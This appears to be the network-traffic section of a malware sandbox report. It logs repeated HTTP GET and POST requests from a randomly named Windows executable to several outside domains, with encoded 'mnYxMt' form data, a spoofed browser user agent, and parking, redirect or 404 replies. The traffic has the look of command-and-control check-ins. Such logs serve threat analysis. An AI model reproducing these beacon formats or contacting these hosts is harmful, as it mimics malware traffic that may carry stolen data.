X-Frame-Options: deny
Content-Encoding: gzip


Session ID: 20
Source IP: 192.168.2.8
Source Port: 49885
Destination IP: 217.160.0.231
Destination Port: 80
PID: 6320
Process: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe

Timestamp: Nov 12, 2024 18:35:12.157274961 CET
Bytes transferred: 547
Direction: OUT
Data:
GET /jp2s/?TTd=yRNPZBU8fZA&mnYxMt=P0qG7QiazDWD2BWfpofH/Z3c5n3R/ut+aX9fXKMK+x60PE0IVfUJFQ907pREBNW8LmwaLsR1/kIgdQ4HVuT4weE+MfzEO7kysrfh1XHRqn8s8FFNRzB3KWFDa4Bz8OGfyA== HTTP/1.1
Host: www.coffee-and-blends.info
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)

Timestamp: Nov 12, 2024 18:35:13.682293892 CET
Bytes transferred: 1236
Direction: IN
Data:
HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 1271
Connection: close
Date: Tue, 12 Nov 2024 17:35:12 GMT
Server: Apache
X-Frame-Options: deny
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]

Timestamp: Nov 12, 2024 18:35:13.682308912 CET
Bytes transferred: 203
Direction: IN
                                                                                                                                                            Data Ascii: + window.location.host + '/' + 'IONOSParkingDE' + '/park.js">' + '<\/script>' ); </script> </body></html>

Timestamp: Nov 12, 2024 18:35:13.682321072 CET
Bytes transferred: 203
Direction: IN
                                                                                                                                                            Data Ascii: + window.location.host + '/' + 'IONOSParkingDE' + '/park.js">' + '<\/script>' ); </script> </body></html>

Timestamp: Nov 12, 2024 18:35:13.682354927 CET
Bytes transferred: 1236
Direction: IN
Data:
HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 1271
Connection: close
Date: Tue, 12 Nov 2024 17:35:12 GMT
Server: Apache
X-Frame-Options: deny
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]

Timestamp: Nov 12, 2024 18:35:13.683923006 CET
Bytes transferred: 1236
Direction: IN
Data:
HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 1271
Connection: close
Date: Tue, 12 Nov 2024 17:35:12 GMT
Server: Apache
X-Frame-Options: deny
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]


Session ID: 21
Source IP: 192.168.2.8
Source Port: 49921
Destination IP: 54.179.173.60
Destination Port: 80
PID: 6320
Process: C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe

Timestamp: Nov 12, 2024 18:35:19.232404947 CET
Bytes transferred: 797
Direction: OUT
Data:
POST /qmcg/ HTTP/1.1
Host: www.tmstore.click
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Origin: http://www.tmstore.click
Referer: http://www.tmstore.click/qmcg/
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 207
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=35ggt26dJQJxW7c6hXW4atBj5OuRuwViSe/R7tnDyx29FoerJ5NW7sYi8Ot2uDKQUc3ZhtAKSVLtK4S+cfQFv+6XFoMjHyP71Tr42Ub+OdmyEHfimLijQ3xqNVaht7XiooT2gQMTOnZtJt3ErjasF8EX2TdhvTOOXExDorX4NpAypKXRB7iEiuecgLXLhVrHsdOv5+M=
Nov 12, 2024 18:35:20.212279081 CET | 364 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:20 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 166
                                                                                                                                                            Connection: close
                                                                                                                                                            Location: https://www.tmstore.click/qmcg/
                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.8 | 49935 | 54.179.173.60 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:35:21.789608002 CET | 817 | OUT | POST /qmcg/ HTTP/1.1
                                                                                                                                                            Host: www.tmstore.click
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.tmstore.click
                                                                                                                                                            Referer: http://www.tmstore.click/qmcg/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=35ggt26dJQJxXas6j0+4bNBiyuuRkQUrSZ3R7oeEzCe9EIurI9hW4sYiuut5jjKLUc66htMKSVvtK9u+coMavu6RKIMbYiP71Tr42UPYOZKyE2vimvOiZXx1d1ahnbXmooTfgRB0OlhtJsHEs26vK8Ed6DcsuyueSV0hp7LJOLVOlc67bZqChu23gI/9ki2v2+efnpbTS5WTOxUgxpxgZFtaSDaj
Nov 12, 2024 18:35:22.784611940 CET | 364 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:22 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 166
                                                                                                                                                            Connection: close
                                                                                                                                                            Location: https://www.tmstore.click/qmcg/
                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.8 | 49948 | 54.179.173.60 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:35:24.335207939 CET | 1834 | OUT | POST /qmcg/ HTTP/1.1
                                                                                                                                                            Host: www.tmstore.click
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.tmstore.click
                                                                                                                                                            Referer: http://www.tmstore.click/qmcg/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Data Ascii: mnYxMt= [TRUNCATED]
Nov 12, 2024 18:35:25.321352959 CET | 364 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:25 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 166
                                                                                                                                                            Connection: close
                                                                                                                                                            Location: https://www.tmstore.click/qmcg/
                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.8 | 49961 | 54.179.173.60 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:35:26.877439976 CET | 538 | OUT | GET /qmcg/?mnYxMt=67IAuCDTBw5QZph6u0mJLa046OmMvBYKYaPJ7pOH3jPtJouGJ8FP+NUi0Lg8hSiTUrSIuLh0DGPLGIiCUYAvzKmUGNgGAEHlgTmn1kSmBKemMzzmn4XCXnVEaEKQ/eq21A==&TTd=yRNPZBU8fZA HTTP/1.1
                                                                                                                                                            Host: www.tmstore.click
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Nov 12, 2024 18:35:27.912062883 CET | 520 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:27 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 166
                                                                                                                                                            Connection: close
                                                                                                                                                            Location: https://www.tmstore.click/qmcg/?mnYxMt=67IAuCDTBw5QZph6u0mJLa046OmMvBYKYaPJ7pOH3jPtJouGJ8FP+NUi0Lg8hSiTUrSIuLh0DGPLGIiCUYAvzKmUGNgGAEHlgTmn1kSmBKemMzzmn4XCXnVEaEKQ/eq21A==&TTd=yRNPZBU8fZA
                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.8 | 49989 | 3.33.130.190 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:35:33.197989941 CET | 803 | OUT | POST /xia9/ HTTP/1.1
                                                                                                                                                            Host: www.softillery.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.softillery.info
                                                                                                                                                            Referer: http://www.softillery.info/xia9/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=3HzJ1oP0xOMJRIcrU0E+kvYaKuggLcT4zRPS+qnGSpWheTFMi8KOkHo/WRaCNkpYVVdeyBjhxXA3shTsUjKlWBy8JknrxZ0SObXXs3zV0f+ceol0Ohbzrr/+6/qt5JeuhjOsnj4vq7Wi2MpcL6FEfI+jMVsFuu4G95qKBTMz6ILSGmQLRPEKLNj8TFVm7F6/cb+HTEs=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.8 | 49999 | 3.33.130.190 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:35:35.737545013 CET | 823 | OUT | POST /xia9/ HTTP/1.1
                                                                                                                                                            Host: www.softillery.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.softillery.info
                                                                                                                                                            Referer: http://www.softillery.info/xia9/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=3HzJ1oP0xOMJSrErSVE+hPYbBOggA8T8zQzS+oKBS/Ohfy1Mj5+O33o/YxaHJkpHVVhgyEDhxWg3slXsUQiqXRy+CEnt+50SObXXszf70fmcdYV0PEulmL/xqfqtuZeqhjOenilnq+Si2OxcP/pFWI+hC1tt/PEIkJa9AQss0LD3Kw9hLtMMINLXTG9Q+ynXG4u3NT61P5uDJlvqvJ2zgdbbHGU3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.8 | 50006 | 3.33.130.190 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:35:38.287031889 CET | 1840 | OUT | POST /xia9/ HTTP/1.1
                                                                                                                                                            Host: www.softillery.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.softillery.info
                                                                                                                                                            Referer: http://www.softillery.info/xia9/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=3HzJ1oP0xOMJSrErSVE+hPYbBOggA8T8zQzS+oKBS/GhfEhMjaWO03o/HBaGJkpOVV5kyEHuxSQ3+QDsShiqZRy+NknoxZ09ObHTszv70fmcdaN0Gxal1b/+6/qh5JeWhj20njR3qKmi2uhcNpdFZI+/F1t1/PJKkJGxARIK0LL3P1Quf/c2f7fHKm984zPdI6+wPzyRYu+fFHvCj6Tb6YqOL298grYewLZl+sPiU6IAwXb/S4TL9kXefZ1Ipwyc2M0Tw/1zQsoffVhxzDQuGpTnTr9sVmJTHCDdwVVu7c6A3rAk7S1xenq3cpLTQdEmzvyjJsfF4MSx48ckA6864kqNkHllrdIFfbSz/8nheQna/RE8rWHF2ZoYgXKUux6URh5rsxpPKIEf/jMZc7TmwYuB9UD8vdwyVZNNyoUKC97s7KCvwrZxjNRFFWqDWa5U30gE8hOD53moOUNAWiQBg0ATQc9N9DLAQyvM9/Qcz2RUEFS26T3pbRNKSgQI7eUG2UG8yHKph24d00lxuYw9axAnpK//fYHaiBNgpSGM6aDEuOgEhKeTN080H48TcBuzMmSZxdc4IhbgpinSZzTglAH/ATs2yV8RbMnXv1U+X2bBrVEzQApECn8VzESSzNkEkw7QGinGP7sFASR1OQrQQjF2D1Tk+mCBs8AeQcM+iyC85QINxon6EoHIexhH32Va7QuHt+g7O/ISsJPFZ+1jrb+hYNNyoZpfsvRU96yZPRajjnKHncDOaQuMMb7j5h8F6pNqono7IZtK1GcFgMnCt65mCTNCduGncSBrAL4jQKG4tdRZJMmBWUwUrsjet9HXK++X/0vo+be5PBgiL+I3wNmDCYNsVcdKB927UHGtfHZmGAzO7effJ4MK8sWW16r1EMvHUUML4ro75nE+e+DlthRRCHgeiFSNa4HP3MCcRvfgPHmCxb6r5uJNspseZ4JxyqPKzEJXcCVnwSriI7meegmzlgZZTbn/VrQA7LnUkQ+PL [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.8 | 50007 | 3.33.130.190 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:35:40.828793049 CET | 540 | OUT | GET /xia9/?TTd=yRNPZBU8fZA&mnYxMt=6Fbp2c2euLl3IpV0Sl4p6qZBCOQHPcn3kT3/256CKoimaApAh5mhtnZkbQOyMHVCRwBLnE72oyxVmwPWVRK3JTmoB07JhO43d4HdqVa/yMKia/c5OjSLq43HtsiZpZ7nyQ== HTTP/1.1
                                                                                                                                                            Host: www.softillery.info
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
Nov 12, 2024 18:35:41.456736088 CET | 410 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:41 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 270
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?TTd=yRNPZBU8fZA&mnYxMt=6Fbp2c2euLl3IpV0Sl4p6qZBCOQHPcn3kT3/256CKoimaApAh5mhtnZkbQOyMHVCRwBLnE72oyxVmwPWVRK3JTmoB07JhO43d4HdqVa/yMKia/c5OjSLq43HtsiZpZ7nyQ=="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.8 | 50008 | 156.226.22.233 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:35:54.796467066 CET | 785 | OUT | POST /moqb/ HTTP/1.1
                                                                                                                                                            Host: www.nad5.shop
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.nad5.shop
                                                                                                                                                            Referer: http://www.nad5.shop/moqb/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 207
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=0QcsiTwWh5kYgIfFRX0jJHHoeqNHElvQsWMlRQ3hhOy63ZbN881SJcBvOK2ftwoDXQyOIr9ELa04dkwZKX4S/kuAjR1s8Iht746V1k/K429vWbS7q8nSMLyTwBWhSwwJbLxpCesyZy9UU8ZSqLDURW5JiePbY/PdeVQauY64m6SJvd6+cgHXL1lWp4cIOk1Rz2bFtzs=
Nov 12, 2024 18:35:55.638773918 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:55 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 548
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.8 | 50009 | 156.226.22.233 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:35:57.433465004 CET | 805 | OUT | POST /moqb/ HTTP/1.1
                                                                                                                                                            Host: www.nad5.shop
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.nad5.shop
                                                                                                                                                            Referer: http://www.nad5.shop/moqb/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 227
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=0QcsiTwWh5kYhpvFX20jBHHrRKNHOFvUsWwlRSbIg9a629XN991SKcBvWa2WpwoMXQuGIudELaw4dhMZKm4dtkuCrx1uhYht746V1kqX4yRvWLi7odndFryQghWhFgwzbLwMCbEIZwFUU+xStaDXbW5Pt+OUZ6q3e3Ami6zet6iPnLXUGCPRI1N9p70+LTo5pVL1zk69uw1u75/fCH6h7W4krv9o
Nov 12, 2024 18:35:58.310489893 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:35:58 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 548
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.8 | 50010 | 156.226.22.233 | 80 | 6320 | C:\Program Files (x86)\pXSNBUHDsqQVToaFHPUXcMuovyvTQqdzPJVsbrLNEr\tIEQBQsFNUYr.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 18:35:59.987641096 CET | 1822 | OUT | POST /moqb/ HTTP/1.1
                                                                                                                                                            Host: www.nad5.shop
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Origin: http://www.nad5.shop
                                                                                                                                                            Referer: http://www.nad5.shop/moqb/
                                                                                                                                                            Connection: close
                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Content-Length: 1243
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                                            Data Ascii: mnYxMt=0QcsiTwWh5kYhpvFX20jBHHrRKNHOFvUsWwlRSbIg9C62OfN8eNSLcBvIK2TpworXQmCIuBuLY44HEAZMVgd30uCnR1j8IhC75WR1k6X4yRvWNu7hsndJLyTwBW1Swx9bKU6CbAYeAlUUeBSsorXTW5Nq+PLZ6use3cqi7G7t5yP2a2rcg/XcVF0t8skLhQ/uV7A5TTTukVn+P3hWV7umw4376UYZ0gsb28jIGZBvcnY1LqdjnqMyWJEMTpVFK6JARl2/DlpX0J8ItmOLFdLNXDeSn5Y/DPd8ViN17uKG+oAULtx/wjG/TyWgmvQ5mjExCF7jBH928apNKRBDn+huCduEXW+vIG9N1rNU8PS5VAiVDMYwmT9HHHh29iAVABhsALmtsMZ23lnHEdTGtwaT/ondjBzuBw7W7sCeN3YwZn4s6Gz3vgVZOYn7POq7vU+v4i5RORozizaqV94K34D2WSymbiT5W/BHw0q51eBrocWQDksu0Wcd9pzofZzBtNqNR+yQowW/UrjL/EAMyDZJsJuY7x0W6HjUFonEdtgHgMwmKRPRb8nuFI1a4YZpoEeGz6GxEckUdTdmpkjIBCPjuJ/x7PIJwiVitKnEbXFGzLaLo9s/pNVojnZ14Qot2dE25LFE147gvaazb1AqG6DwzaDmoM9txgJBP9gAOStqej/w97MU+Jc2JSyctYcfJncaIfIQ2b3sliMSxaRmkm24rOyLqEg0rvMMtB2DGWK8jDg3rwju5fX5bMBpuSKqFthhjmyPwB8xxnJF8IrLtZIUVzGoQ/0hbIj1KsLVj6ZcLlH0ZXnKTrIAofHPhI6ONby4lwZM0Su5HHtRKpT0VMUN6dhhcrdoM6CHVT7Jnv7a6OTqBdp+RROtOYKUtf6DdBwNytYYUfKqn97RG0H2I82IKZs2REYV/WqzatBLfwkojJn+UTnc/AZCGWfyRKoUbSneKQzwuHei+M7NVeh/szhJ1WSh6ngWKSJgIrsEQZpqfG5V [TRUNCATED]
Nov 12, 2024 18:36:00.935507059 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx
                                                                                                                                                            Date: Tue, 12 Nov 2024 17:36:00 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 548
                                                                                                                                                            Connection: close
